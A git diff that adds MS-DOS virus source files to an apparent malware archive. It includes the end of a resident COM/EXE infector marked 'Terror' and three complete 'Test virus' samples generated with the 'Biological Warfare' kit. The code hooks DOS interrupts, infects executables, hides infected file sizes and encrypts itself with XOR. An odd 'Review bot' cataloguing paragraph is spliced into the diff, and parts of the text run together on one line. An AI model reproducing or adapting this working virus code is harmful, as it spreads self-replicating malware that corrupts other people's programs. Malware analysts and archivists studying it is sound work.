+ mov di,cs:FileBytes [10h]
+ push es
+ pop ds
+ cli
+ mov ss,si
+ mov sp,di
+ sti
+ jmp dword ptr cs:FileBytes [14h]
+
+Install: mov ah,30h
+ int 21h
+ mov bx,offset Table310
+ cmp ax,0A03h
+ jne Not310
+ mov ax,0070h
+ mov bx,0D43h
+ mov es,ax
+ cmp byte ptr es:[bx],2Eh ; CS prefix
+ jne SetVectors
+ mov ax,bx
+ jmp short SetV1
+Not310: add bx,4
+ cmp ax,1403h
+ je SetVectors
+ add bx,4
+ cmp ax,1E03h
+ je SetVectors
+ mov ax,3513h
+ int 21h
+ mov word ptr cs:True13, bx
+ mov word ptr cs:True13 + 2,es
+ mov ax,3521h
+ mov dx,bx
+ jmp short Set21
+SetVectors: mov ax,word ptr cs:[bx+2]
+SetV1: mov dx,word ptr cs:[bx]
+ mov word ptr cs:True13,ax
+ mov word ptr cs:True13 + 2,0070h
+ mov ah,34h
+ int 21h
+Set21: push es
+ pop ds
+ mov ax,25ECh
+ int 21h
+ mov ax,word ptr cs:PSPSeg
+ mov es,ax
+ dec ax
+ mov ds,ax
+ mov bx,word ptr ds:[3]
+ sub bx,101
+ add ax,bx
+ mov word ptr es:[0002h],ax ; Setup PSP memory size.
+ ; Command.COM needs that
+ ; action; else the system
+ ; hangs.
+ mov ah,4Ah
+ int 0ECh
+ mov bx,100
+ mov ah,48h
+ int 0ECh
+ sub ax,10h
+ mov es,ax
+ mov byte ptr ds:[0000h],5Ah ; This is the last block,
+ ; don't you think so?
+ push cs
+ pop ds
+ mov si,100h
+ mov di,si
+ mov cx,MovedSize
+ rep movsb
+ mov di,offset Continue
+ push es
+ push di
+ retf
+
+Continue: mov word ptr es:[0F1h],0070h
+ mov ax,3521h
+ int 0ECh
+ mov word ptr cs:Saved21, bx
+ mov word ptr cs:Saved21 + 2,es
+ mov ah,25h
+ mov dx,offset Int21
+ push cs
+ pop ds
+ int 0ECh
+ push cs
+ pop es
+ mov di,offset Handles
+ mov cx,25
+ mov al,0
+ rep stosb
+ jmp StartFile
+
+Respond: mov bp,ax
+ iret
+
+Int21: cmp ax,0EC59h
+ je Respond
+ cmp ax,4B00h
+ je Exec
+ cmp ah,3Dh
+ je Open
+ cmp ah,3Eh
+ je Close
+ cmp ah,11h
+ jne End21
+ push di
+ mov di,dx
+ cmp byte ptr ds:[di+6],08 ; Volume ID attributes
+ je Find1st
+EndF1st: pop di
+End21: db 0EAh
+Saved21 dd ?
+Exec: call InfectName
+ jmp End21
+OpenEnd: pop cx
+ jmp End21
+Open: push cx
+ call GetAttr
+ jc OpenEnd
+ cmp cx,20h
+ pop cx
+ jne End21
+ mov al,2
+ pushf
+ call dword ptr cs:Saved21
+ jc Err21
+ push ax
+ push bx
+ mov bx,ax
+ mov al,byte ptr cs:Command?
+ mov byte ptr cs:Handles [bx],al
+ pop bx
+ pop ax
+Err21: retf 2
+Close: cmp byte ptr cs:Handles [bx],0
+ jz End21
+ push ax
+ mov al,byte ptr cs:Handles [bx]
+ mov byte ptr cs:Command?,al
+ mov byte ptr cs:Handles [bx],0
+ mov ah,45h
+ int 0ECh
+ mov word ptr cs:TempHandle,ax
+ pop ax
+ jc End21
+ pushf
+ call dword ptr cs:Saved21
+ jc Err21
+ push bx
+ mov bx,word ptr cs:TempHandle
+ push ds
+ call SetV
+ call InfectHandle
+ call Restore
+ pop ds
+ pop bx
+ clc
+ retf 2
+Find1st: push ax
+ push dx
+ push ds
+ mov al,byte ptr ds:[di+7]
+ mov dx,offset Comspec
+ or al,al
+ jz CurrentDrive
+ add al,'A'-1
+ mov byte ptr cs:Comspec,al
+ jmp short Infect1st
+CurrentDrive: add dx,2
+Infect1st: push cs
+ pop ds
+ call InfectName
+ pop ds
+ pop dx
+ pop ax
+ jmp EndF1st
+
+InfectName: push ax
+ push bx
+ push cx
+ call GetAttr
+ jc EndIN0
+ push cx
+ push ds
+ call SetV
+ pop ds
+ mov ax,4301h
+ xor cx,cx
+ int 0ECh
+ jc EndIN1
+ mov ax,3D02h
+ int 0ECh
+ mov bx,ax
+EndIN1: pop cx
+ jc EndInfName
+ call InfectHandle
+ mov ax,4301h
+ int 0ECh
+EndInfName: call Restore
+EndIN0: pop cx
+ pop bx
+ pop ax
+ ret
+
+SetV: push ax
+ push dx
+ push bx
+ push es
+ mov ax,3513h
+ int 0ECh
+ mov word ptr cs:Old13,bx
+ mov word ptr cs:Old13+2,es
+ mov al,24h
+ int 0ECh
+ mov word ptr cs:Old24,bx
+ mov word ptr cs:Old24+2,es
+ pop es
+ pop bx
+ push cs
+ pop ds
+ mov dx,offset Critical
+ mov ah,25h
+ int 0ECh
+ mov dx,offset Int13
+ mov al,13h
+ int 0ECh
+ pop dx
+ pop ax
+ ret
+
+InfectHandle: push ax
+ push cx
+ push dx
+ push si
+ push di
+ push ds
+ mov di,offset FileBytes
+ mov cx,0FFFFh
+ mov dx,-6
+ mov ax,4202h
+ int 0ECh
+ mov ah,3Fh
+ mov cx,6
+ push cs
+ pop ds
+ mov dx,di
+ int 0ECh
+ jc EndH1
+ cmp word ptr cs:[di],'eT'
+ je EndH1
+ xor cx,cx
+ xor dx,dx
+ mov ax,4200h
+ int 0ECh
+ mov ah,3Fh
+ mov cx,24
+ mov dx,di
+ int 0ECh
+ jnc ReadOk
+EndH1: jmp EndInfHandle
+ReadOk: xor cx,cx
+ xor dx,dx
+ cmp byte ptr cs:Command?,2
+ jne Seek
+ cmp word ptr ds:[di+1],4000h ; Is there some
+ ; another virus
+ ; in the stack?
+ ja EndH1
+ dec cx
+ mov dx,-(VirusSize+64)
+Seek: mov ax,4202h
+Seek1: int 0ECh
+ test ax,000Fh
+ jz SeekOk
+ mov cx,dx
+ mov dx,ax
+ add dx,10h
+ and dl,0F0h
+ mov ax,4200h
+ jmp Seek1
+SeekOk: call CheckEXE
+ je SkipEXE
+ or dx,dx
+ jnz EndH1
+ cmp ax,1024
+ jnb MayBeGood?
+ jmp EndInfHandle
+MayBeGood?: cmp ax,64000
+ ja EndInfHandle
+SkipEXE: mov cl,4
+ shr ax,cl
+ mov si,ax
+ mov cl,12
+ shl dx,cl
+ add si,dx
+ mov ah,40h
+ mov dx,100h
+ mov cx,VirusSize
+ int 0ECh
+ jc EndInfHandle
+ call CheckEXE
+ jne ComFile
+ sub si,10h
+ sub si,word ptr cs:[di+08h]
+ mov word ptr cs:[di+14h],100h
+ mov word ptr cs:[di+16h],si
+ mov word ptr cs:[di+10h],400h
+ add si,VirusSize / 16 + 1
+ mov word ptr cs:[di+0Eh],si
+ mov ax,4202h
+ xor cx,cx
+ xor dx,dx
+ int 0ECh
+ mov cx,200h
+ div cx
+ or dx,dx
+ jz DontAdjust
+ inc ax
+DontAdjust: mov word ptr cs:[di+02h],dx
+ mov word ptr cs:[di+04h],ax
+ jmp short Common
+ComFile: push si
+ push di
+ push es
+ push cs
+ pop es
+ mov si,offset ComHeader
+ mov cx,11
+ rep movsb
+ pop es
+ pop di
+ pop ds:[di+11]
+Common: mov ax,4200h
+ xor cx,cx
+ xor dx,dx
+ int 0ECh
+ mov ah,40h
+ mov cx,24
+ mov dx,di
+ int 0ECh
+EndInfHandle: mov ax,5700h
+ int 0ECh
+ mov al,1
+ int 0ECh
+ mov ah,3Eh
+ int 0ECh
+ pop ds
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop ax
+ ret
+
+Restore: push ax
+ push dx
+ push ds
+ mov ax,2513h
+ mov dx,word ptr cs:Old13
+ mov ds,word ptr cs:Old13+2
+ int 0ECh
+ mov al,24h
+ mov dx,word ptr cs:Old24
+ mov ds,word ptr cs:Old24+2
+ pop ds
+ pop dx
+ pop ax
+ ret
+
+GetAttr: push ax
+ push es
+ push di
+ push bx
+ mov di,dx
+ push ds
+ pop es
+ mov al,0
+ mov cx,64
+ repne scasb
+ mov ax,word ptr ds:[di-3]
+ mov cx,word ptr ds:[di-5]
+ and ax,5F5Fh ; Upcase extension
+ and ch,5Fh
+ cmp ax,'MO'
+ jne Exe?
+ cmp cx,'C.'
+ je CommandChk
+ErrAttr: stc
+ jmp short EndAttr
+Exe?: cmp ax,'EX'
+ jne ErrAttr
+ cmp cx,'E.'
+ jne ErrAttr
+CommandChk: mov cx,7
+ mov bx,-1
+Loop0: inc bx
+ mov al,byte ptr ds:[bx+di-12]
+ and al,5Fh
+ cmp al,byte ptr cs:Comspec [bx+3]
+ loope Loop0
+ mov al,1
+ jne NoCommand
+ mov al,2
+NoCommand: mov byte ptr cs:Command?,al
+ mov ax,4300h
+ int 0ECh
+EndAttr: pop bx
+ pop di
+ pop es
+ pop ax
+ ret
+
+Critical: mov al,3
+ iret
+
+Int13: cmp ah,3
+ jz Skip13
+ db 0EAh ; JMP Far
+Old13 dd ?
+Skip13: db 0EAh
+True13 dd ?
+
+ComHeader db 50h,8Ch,0C8h,01h,06h,0Bh,01h,58h,0EAh,00h,01h
+
+Terror db ' Terror'
+
+VirusEnd label byte
+
+VirusSize = offset VirusEnd - offset Start
+
+Old24 dd ?
+
+TempHandle label word
+PSPSeg dw ?
+
+MovedSize = $ - offset Start
+
+Handles db 25 dup (?)
+
+Command? db ?
+
+Code EndS
+ End Start
diff --git a/MSDOS/Virus.MSDOS.Unknown.test1.asm b/MSDOS/Virus.MSDOS.Unknown.test1.asm
new file mode 100644
index 00000000..ea61555f
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.test1.asm
@@ -0,0 +1,379 @@
+; test1.asm : Test virus #1
+; Created with Biological Warfare - Version 0.90 by MnemoniX
+
+PING equ 0F43Fh
+PONG equ 0B1DEh
+STAMP equ 26
+MARKER equ 07070h
+
+code segment
+ org 0
+ assume cs:code,ds:code
+
+start:
+ db 0E9h,3,0 ; to virus
+host:
+ db 0CDh,20h,0 ; host program
+virus_begin:
+ push ds es
+
+ call $ + 3 ; BP is instruction ptr.
+ pop bp
+ sub bp,offset $ - 1
+
+ xor ax,ax ; mild anti-trace code
+ mov es,ax ; kill interrupts 1 & 3
+ mov di,6
+ stosw
+ mov di,14
+ stosw
+
+ in al,21h ; lock out & reopen keyboard
+ xor al,2
+ out 21h,al
+ xor al,2
+ out 21h,al
+
+ mov ax,PING ; test for residency
+ int 21h
+ cmp bx,PONG
+ je installed
+
+ mov ax,es ; Get PSP
+ dec ax
+ mov ds,ax ; Get MCB
+
+ sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
+ sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
+ mov es,word ptr ds:[12h]
+
+ push cs ; copy virus into memory
+ pop ds
+ xor di,di
+ mov si,bp
+ mov cx,(virus_end - start) / 2 + 1
+ rep movsw
+
+ xor ax,ax ; capture interrupts
+ mov ds,ax
+
+ mov si,21h * 4 ; get original int 21
+ mov di,offset old_int_21
+ movsw
+ movsw
+
+ mov word ptr ds:[si - 4],offset new_int_21
+ mov ds:[si - 2],es ; and set new int 21
+
+installed:
+ pop es ds ; restore segregs
+ cmp sp,MARKER ; check for .EXE
+ je exe_exit
+
+com_exit:
+ mov si,[bp + mutator] ; restore host program
+ sub si,3
+ mov di,100h
+ push di
+ movsw
+ movsb
+
+ call fix_regs ; fix up registers
+ ret ; and leave
+exe_exit:
+ mov ax,ds ; fix up return address
+ add ax,10h
+ push ax
+ add ax,cs:[bp + exe_cs]
+ mov cs:[bp + return_cs],ax
+
+ mov ax,cs:[bp + exe_ip]
+ mov cs:[bp + return_ip],ax
+
+ pop ax
+ add ax,cs:[bp + exe_ss] ; restore stack
+ cli
+ mov ss,ax
+ mov sp,cs:[bp + exe_sp]
+
+ call fix_regs ; fix up registers
+ sti
+
+ db 0EAh ; back to host program
+return_ip dw 0
+return_cs dw 0
+
+exe_cs dw -16 ; orig CS:IP
+exe_ip dw 103h
+exe_sp dw -2 ; orig SS:SP
+exe_ss dw -16
+
+fix_regs:
+ xor ax,ax
+ cwd
+ xor bx,bx
+ mov si,100h
+ xor di,di
+ xor bp,bp
+ ret
+
+; interrupt 21 handler
+int_21:
+ pushf
+ call dword ptr cs:[old_int_21]
+ ret
+
+new_int_21:
+ cmp ax,PING ; residency test
+ je ping_pong
+ cmp ah,3Dh ; file open
+ je file_open
+ cmp ax,4B00h ; execute program
+ je execute
+int_21_exit:
+ db 0EAh ; never mind ...
+old_int_21 dd 0
+
+ping_pong:
+ mov bx,PONG
+ iret
+
+file_open:
+ push ax cx di es
+ call get_extension
+ cmp [di],'OC' ; .COM file?
+ jne perhaps_exe ; perhaps .EXE then
+ cmp byte ptr [di + 2],'M'
+ jne not_prog
+ jmp a_program
+perhaps_exe:
+ cmp [di],'XE' ; .EXE file?
+ jne not_prog
+ cmp byte ptr [di + 2],'E'
+ jne not_prog
+a_program:
+ pop es di cx ax
+ jmp execute ; infect file
+not_prog:
+ pop es di cx ax
+ jmp int_21_exit
+
+execute:
+ push ax bx cx dx si di ds es
+
+ xor ax,ax ; critical error handler
+ mov es,ax ; routine - catch int 24
+ mov es:[24h * 4],offset int_24
+ mov es:[24h * 4 + 2],cs
+
+ mov ax,4300h ; change attributes
+ int 21h
+
+ push cx dx ds
+ xor cx,cx
+ call set_attributes
+
+ mov ax,3D02h ; open file
+ call int_21
+ jnc open_it
+ jmp cant_open
+open_it:
+ xchg bx,ax
+
+ push cs ; CS = DS
+ pop ds
+
+ mov ax,5700h ; save file date/time
+ int 21h
+ push cx dx
+ and cl,31 ; check time stamp
+ cmp cl,STAMP
+ jnz its_ok
+ jmp dont_infect
+its_ok:
+ mov ah,3Fh
+ mov cx,28
+ mov dx,offset read_buffer
+ int 21h
+
+ cmp word ptr read_buffer,'ZM' ; .EXE?
+ jne its_ok_2
+ jmp infect_exe
+its_ok_2:
+ mov al,2 ; move to end of file
+ call move_file_ptr
+
+ cmp dx,65279 - (VIRUS_SIZE + 3)
+ ja dont_infect ; too big, don't infect
+
+ mov word ptr new_jump + 1,dx
+
+ add dx,103h
+ mov mutator,dx
+ push cs ; call Biological Warfare
+ pop es ; Mutation Engine
+ mov cx,VIRUS_SIZE
+ mov di,offset encrypt_buffer
+ mov si,offset virus_begin
+
+ call _bwme
+
+ push cx
+ mov cx,3
+ mov ah,40h
+ mov dx,offset read_buffer ; save original program head
+ int 21h
+
+ mov ah,40h ; write virus to file
+ pop cx
+ mov dx,offset encrypt_buffer
+ int 21h
+
+ xor al,al ; back to beginning of file
+ call move_file_ptr
+
+ mov dx,offset new_jump ; and write new jump
+ int 21h
+
+fix_date_time:
+ pop dx cx
+ and cl,-32 ; add time stamp
+ or cl,STAMP
+ mov ax,5701h ; restore file date/time
+ int 21h
+
+close:
+ pop ds dx cx ; restore attributes
+ call set_attributes
+
+ mov ah,3Eh ; close file
+ int 21h
+
+cant_open:
+ pop es ds di si dx cx bx ax
+ jmp int_21_exit ; leave
+
+
+set_attributes:
+ mov ax,4301h
+ int 21h
+ ret
+
+dont_infect:
+ pop cx dx ; can't infect, skip
+ jmp close
+
+move_file_ptr:
+ mov ah,42h ; move file pointer
+ cwd
+ xor cx,cx
+ int 21h
+
+ mov dx,ax ; set up registers
+ mov ah,40h
+ mov cx,3
+ ret
+infect_exe:
+ cmp word ptr read_buffer[26],0
+ jne dont_infect ; overlay, don't infect
+
+ cmp word ptr read_buffer[16],MARKER
+ je dont_infect ; infected already
+
+ les ax,dword ptr read_buffer[20]
+ mov exe_cs,es ; CS
+ mov exe_ip,ax ; IP
+
+ les ax,dword ptr read_buffer[14]
+ mov exe_ss,ax ; SS
+ mov exe_sp,es ; SP
+ mov word ptr read_buffer[16],MARKER
+
+ mov ax,4202h ; to end of file
+ cwd
+ xor cx,cx
+ int 21h
+
+ push ax dx ; save file size
+
+ push bx
+ mov cl,12 ; calculate offsets for CS
+ shl dx,cl ; and IP
+ mov bx,ax
+ mov cl,4
+ shr bx,cl
+ add dx,bx
+ and ax,15
+ pop bx
+
+ sub dx,word ptr read_buffer[8]
+ mov word ptr read_buffer[22],dx
+ mov word ptr read_buffer[20],ax
+ add dx,100
+ mov word ptr read_buffer[14],dx
+
+ pop dx ax ; calculate prog size
+
+ add ax,VIRUS_SIZE + 3
+ adc dx,0
+ mov cx,512 ; in pages
+ div cx ; then save results
+ inc ax
+ mov word ptr read_buffer[2],dx
+ mov word ptr read_buffer[4],ax
+ mov dx,word ptr read_buffer[20]
+ mov cx,VIRUS_SIZE ; call BWME
+ mov di,offset encrypt_buffer
+ mov si,offset virus_begin
+ push cs
+ pop es
+
+ call _bwme
+
+
+ mov ah,40h
+ mov dx,offset encrypt_buffer
+ int 21h
+
+
+ mov ax,4200h ; back to beginning
+ cwd
+ xor cx,cx
+ int 21h
+
+ mov ah,40h ; and fix up header
+ mov cx,28
+ mov dx,offset read_buffer
+ int 21h
+ jmp fix_date_time ; done
+
+courtesy_of db '[BW]',0
+signature db 'Test virus #1',0
+
+get_extension:
+ push ds ; find extension
+ pop es
+ mov di,dx
+ mov cx,64
+ mov al,'.'
+ repnz scasb
+ ret
+ include bwme.asm
+
+int_24:
+ mov al,3 ; int 24 handler
+ iret
+mutator dw 106h
+new_jump db 0E9h,0,0
+
+virus_end:
+VIRUS_SIZE equ virus_end - virus_begin
+read_buffer db 28 dup (?) ; read buffer
+encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer
+
+end_heap:
+
+MEM_SIZE equ end_heap - start
+
+code ends
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.test2.asm b/MSDOS/Virus.MSDOS.Unknown.test2.asm
new file mode 100644
index 00000000..37a10ecc
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.test2.asm
@@ -0,0 +1,303 @@ +; test2.asm : Test virus #2 +; Created with Biological Warfare - Version 0.90 by MnemoniX + +PING equ 0A6CFh +INFECT equ 2 +MARKER equ 08080h + +code segment + org 100h + assume cs:code,ds:code + +start: + db 0E9h,3,0 ; to virus +host: + db 0CDh,20h,0 ; host program +virus_begin: + push ds es + + call $ + 3 ; BP is instruction ptr. + pop bp + sub bp,offset $ - 1 + + xor ax,ax ; mild anti-trace code + mov es,ax ; kill interrupts 1 & 3 + mov di,6 + stosw + mov di,14 + stosw + + in al,21h ; lock out & reopen keyboard + xor al,2 + out 21h,al + xor al,2 + out 21h,al + + push cs + pop ds + lea dx,[bp + offset new_DTA] + mov ah,1Ah + int 21h + + mov byte ptr [bp + infections],0 + + push [bp + exe_cs] + push [bp + exe_ip] + push [bp + exe_ss] + push [bp + exe_sp] + call traverse + + call activate + + pop [bp + exe_sp] + pop [bp + exe_ss] + pop [bp + exe_ip] + pop [bp + exe_cs] + pop es ds + mov dx,80h + mov ah,1Ah + int 21h + +exe_exit: + mov ax,ds ; fix up return address + add ax,10h + push ax + add ax,cs:[bp + exe_cs] + mov cs:[bp + return_cs],ax + + mov ax,cs:[bp + exe_ip] + mov cs:[bp + return_ip],ax + + pop ax + add ax,cs:[bp + exe_ss] ; restore stack + cli + mov ss,ax + mov sp,cs:[bp + exe_sp] + + call fix_regs ; fix up registers + sti + + db 0EAh ; back to host program +return_ip dw 0 +return_cs dw 0 + +exe_cs dw -16 ; orig CS:IP +exe_ip dw 103h +exe_sp dw -2 ; orig SS:SP +exe_ss dw -16 + +fix_regs: + xor ax,ax + cwd + xor bx,bx + mov si,100h + xor di,di + xor bp,bp + ret + + +traverse: + sub sp,64 ; allocate stack space + mov si,sp + inc si + mov ah,47h ; get current directory + xor dl,dl + push ds + push ss + pop ds + int 21h + + pop ds + dec si + mov byte ptr ss:[si],'\' ; fix directory + +next_dir: + call infect_dir + + cmp byte ptr [bp + infections],INFECT + je traverse_done + + lea dx,[bp + outer] ; repeat in next dir up + mov ah,3Bh + int 21h + jnc next_dir + +traverse_done: + add sp,64 ; reset + mov dx,si + push ds + push ss + pop ds + mov 
ah,3Bh + int 21h + pop ds + ret + +infect_dir: + mov ah,4Eh + lea dx,[bp + find_me] + int 21h + jc infect_done + +next_file: + lea dx,[bp + new_DTA + 1Eh] + call execute + cmp byte ptr [bp + infections],INFECT + je infect_done + mov ah,4Fh + int 21h + jnc next_file + +infect_done: + ret +execute: + push si + + mov ax,4300h ; change attributes + int 21h + + push cx dx ds + xor cx,cx + call set_attributes + + mov ax,3D02h ; open file + int 21h + jc cant_open + xchg bx,ax + + mov ax,5700h ; save file date/time + int 21h + push cx dx + mov ah,3Fh + mov cx,28 + lea dx,[bp + read_buffer] + int 21h + + cmp word ptr [bp + read_buffer],'ZM' + je infect_exe ; yes, infect as .EXE + + jmp dont_infect + +fix_date_time: + pop dx cx + mov ax,5701h ; restore file date/time + int 21h + + inc byte ptr [bp + infections] + +close: + pop ds dx cx ; restore attributes + call set_attributes + + mov ah,3Eh ; close file + int 21h + +cant_open: + pop si + ret + + +set_attributes: + mov ax,4301h + int 21h + ret + +dont_infect: + pop cx dx ; can't infect, skip + jmp close + +infect_exe: + cmp word ptr [bp + read_buffer + 26],0 + jne dont_infect ; overlay, don't infect + + cmp word ptr [bp + read_buffer + 16],MARKER + je dont_infect ; infected already + + les ax,dword ptr [bp + read_buffer + 20] + mov [bp + exe_cs],es + mov [bp + exe_ip],ax + les ax,dword ptr [bp + read_buffer + 14] + mov [bp + exe_ss],ax + mov [bp + exe_sp],es + mov word ptr [bp + read_buffer + 16],MARKER + mov ax,4202h ; to end of file + cwd + xor cx,cx + int 21h + + push ax dx ; save file size + + push bx + mov cl,12 ; calculate offsets for CS + shl dx,cl ; and IP + mov bx,ax + mov cl,4 + shr bx,cl + add dx,bx + and ax,15 + pop bx + + sub dx,word ptr [bp + read_buffer + 8] + mov word ptr [bp + read_buffer + 22],dx + mov word ptr [bp + read_buffer + 20],ax + add dx,100h + mov word ptr [bp + read_buffer + 14],dx + + pop dx ax ; calculate prog size + + add ax,VIRUS_SIZE + 3 + adc dx,0 + mov cx,512 ; in pages + div cx ; then 
save results + inc ax + mov word ptr [bp + read_buffer + 2],dx + mov word ptr [bp + read_buffer + 4],ax + + mov ah,40h + mov cx,VIRUS_SIZE + 3 + lea dx,[bp + virus_begin] + int 21h + + + mov ax,4200h ; back to beginning + cwd + xor cx,cx + int 21h + + mov ah,40h ; and fix up header + mov cx,28 + lea dx,[bp + read_buffer] + int 21h + jmp fix_date_time ; done + +activate: + ; Insert your routine here + ret + +courtesy_of db '[BW]',0 +signature db 'Test virus #2',0 + +get_extension: + push ds ; find extension + pop es + mov di,dx + mov cx,64 + mov al,'.' + repnz scasb + ret + +find_me db '*.EXE',0 +outer db '..',0 + +infections db 0 +virus_end: +VIRUS_SIZE equ virus_end - virus_begin +read_buffer db 28 dup (?) ; read buffer +new_DTA db 128 dup(?) + +end_heap: + +MEM_SIZE equ end_heap - start + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.test3.asm b/MSDOS/Virus.MSDOS.Unknown.test3.asm new file mode 100644 index 00000000..57cf1b1f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.test3.asm 
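Review bot: `get_extension` and the `PING` constant are defined but never referenced anywhere in this file (there is no `call get_extension` and nothing compares against `PING`), which reads as Biological Warfare 0.90 template residue rather than live code, so a header comment such as `; BW 0.90 generator output - get_extension and PING are unused in this variant` would save the next analyst a search. For cataloguing, the artefacts that stay constant in every generated sample are the `'[BW]'` and `'Test virus #2'` strings and the `MARKER` word that `infect_exe` stores at EXE-header offset 16 before writing the 28-byte header back; `activate` is an empty stub, so the sample carries no payload beyond the `INFECT`-limited directory walk. Recording those in the same header would make the archive entry self-describing.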
@@ -0,0 +1,318 @@ +; test3.asm : Test virus #3 +; Created with Biological Warfare - Version 0.90 by MnemoniX + +PING equ 0FA10h +PONG equ 0B8D4h +STAMP equ 31 + +code segment + org 0 + assume cs:code,ds:code + +start: + db 0E9h,3,0 ; to virus +host: + db 0CDh,20h,0 ; host program +virus_begin: + + db 0BBh ; decryption module +code_offset dw offset virus_code + mov si,VIRUS_SIZE / 2 + 1 + db 0B8h +cipher dw 0 + +decrypt: + xor cs:[bx],ax + add bx,2 + dec si + jnz decrypt + + +virus_code: + push ds es + + call $ + 3 ; BP is instruction ptr. + pop bp + sub bp,offset $ - 1 + + mov ax,PING ; test for residency + int 21h + cmp dx,PONG + je installed + + mov ax,es ; Get PSP + dec ax + mov ds,ax ; Get MCB + + sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64 + sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64 + mov es,word ptr ds:[12h] + + push cs ; copy virus into memory + pop ds + xor di,di + mov si,bp + mov cx,(virus_end - start) / 2 + 1 + rep movsw + + xor ax,ax ; capture interrupts + mov ds,ax + + mov si,21h * 4 ; get original int 21 + mov di,offset old_int_21 + movsw + movsw + + mov word ptr ds:[si - 4],offset new_int_21 + mov ds:[si - 2],es ; and set new int 21 + +installed: + pop es ds ; restore segregs +com_exit: + lea si,[bp + host] ; restore host program + mov di,100h + push di + movsw + movsb + + call fix_regs ; fix up registers + ret ; and leave + +fix_regs: + xor ax,ax + cwd + xor bx,bx + mov si,100h + xor di,di + xor bp,bp + ret + +; interrupt 21 handler +int_21: + pushf + call dword ptr cs:[old_int_21] + ret + +new_int_21: + cmp ax,PING ; residency test + je ping_pong + cmp ah,11h ; directory stealth + je dir_stealth + cmp ah,12h + je dir_stealth + cmp ah,4Eh ; directory stealth + je dir_stealth_2 + cmp ah,4Fh + je dir_stealth_2 + cmp ax,4B00h ; execute program + jne int_21_exit + jmp execute +int_21_exit: + db 0EAh ; never mind ... 
+old_int_21 dd 0 + +ping_pong: + mov dx,PONG + iret + +dir_stealth: + call int_21 ; get dir entry + test al,al + js dir_stealth_done + + push ax bx es + mov ah,2Fh + int 21h + + cmp byte ptr es:[bx],-1 ; check for extended FCB + jne no_ext_FCB + add bx,7 +no_ext_FCB: + mov ax,es:[bx + 17h] ; check for infection marker + and al,31 + cmp al,STAMP + jne dir_fixed + + sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3 + sbb word ptr es:[bx + 1Fh],0 +dir_fixed: + pop es bx ax +dir_stealth_done: + iret + +dir_stealth_2: + pushf + call dword ptr cs:[old_int_21] + jc dir_stealth_done_2 + +check_infect2: + push ax bx es + + mov ah,2Fh + int 21h + mov ax,es:[bx + 16h] + and al,31 ; check timestamp + cmp al,STAMP + jne fixed_2 + + sub es:[bx + 1Ah],VIRUS_SIZE + 3 + sbb word ptr es:[bx + 1Ch],0 + +fixed_2: + pop es bx ax + clc ; clear carry +dir_stealth_done_2: + retf 2 +execute: + push ax bx cx dx si di ds es + + xor ax,ax ; critical error handler + mov es,ax ; routine - catch int 24 + mov es:[24h * 4],offset int_24 + mov es:[24h * 4 + 2],cs + + mov ax,4300h ; change attributes + int 21h + + push cx dx ds + xor cx,cx + call set_attributes + + mov ax,3D02h ; open file + int 21h + jc cant_open + xchg bx,ax + + push cs ; CS = DS + pop ds + + mov ax,5700h ; save file date/time + int 21h + push cx dx + mov ah,3Fh + mov cx,28 + mov dx,offset read_buffer + int 21h + + cmp word ptr read_buffer,'ZM' ; .EXE? 
+ je dont_infect ; .EXE, skip + + mov al,2 ; move to end of file + call move_file_ptr + + cmp dx,65279 - (VIRUS_SIZE + 3) + ja dont_infect ; too big, don't infect + + sub dx,VIRUS_SIZE + 3 ; check for previous infection + cmp dx,word ptr read_buffer + 1 + je dont_infect + + add dx,VIRUS_SIZE + 3 + mov word ptr new_jump + 1,dx + + add dx,103h + call encrypt_code ; encrypt virus + + mov dx,offset read_buffer ; save original program head + int 21h + + mov ah,40h ; write virus to file + mov cx,VIRUS_SIZE + mov dx,offset encrypt_buffer + int 21h + + xor al,al ; back to beginning of file + call move_file_ptr + + mov dx,offset new_jump ; and write new jump + int 21h + +fix_date_time: + pop dx cx + and cl,-32 ; add time stamp + or cl,STAMP + mov ax,5701h ; restore file date/time + int 21h + +close: + pop ds dx cx ; restore attributes + call set_attributes + + mov ah,3Eh ; close file + int 21h + +cant_open: + pop es ds di si dx cx bx ax + jmp int_21_exit ; leave + + +set_attributes: + mov ax,4301h + int 21h + ret + +dont_infect: + pop cx dx ; can't infect, skip + jmp close + +move_file_ptr: + mov ah,42h ; move file pointer + cwd + xor cx,cx + int 21h + + mov dx,ax ; set up registers + mov ah,40h + mov cx,3 + ret + +courtesy_of db '[BW]',0 +signature db 'Test virus #3',0 + + +encrypt_code: + push ax cx + + push dx + xor ah,ah ; get time for random number + int 1Ah + + mov cipher,dx ; save encryption key + pop cx + add cx,virus_code - virus_begin + mov code_offset,cx ; save code offset + + push cs ; ES = CS + pop es + + mov si,offset virus_begin ; move decryption module + mov di,offset encrypt_buffer + mov cx,virus_code - virus_begin + rep movsb + + mov cx,VIRUS_SIZE / 2 + 1 +encrypt: + lodsw ; encrypt virus code + xor ax,dx + stosw + loop encrypt + + pop cx ax + ret + +int_24: + mov al,3 ; int 24 handler + iret +new_jump db 0E9h,0,0 + +virus_end: +VIRUS_SIZE equ virus_end - virus_begin +read_buffer db 28 dup (?) ; read buffer +encrypt_buffer db VIRUS_SIZE dup (?) 
; encryption buffer + +end_heap: + +MEM_SIZE equ end_heap - start + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.thief.asm b/MSDOS/Virus.MSDOS.Unknown.thief.asm new file mode 100644 index 00000000..e98dd3d6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.thief.asm 
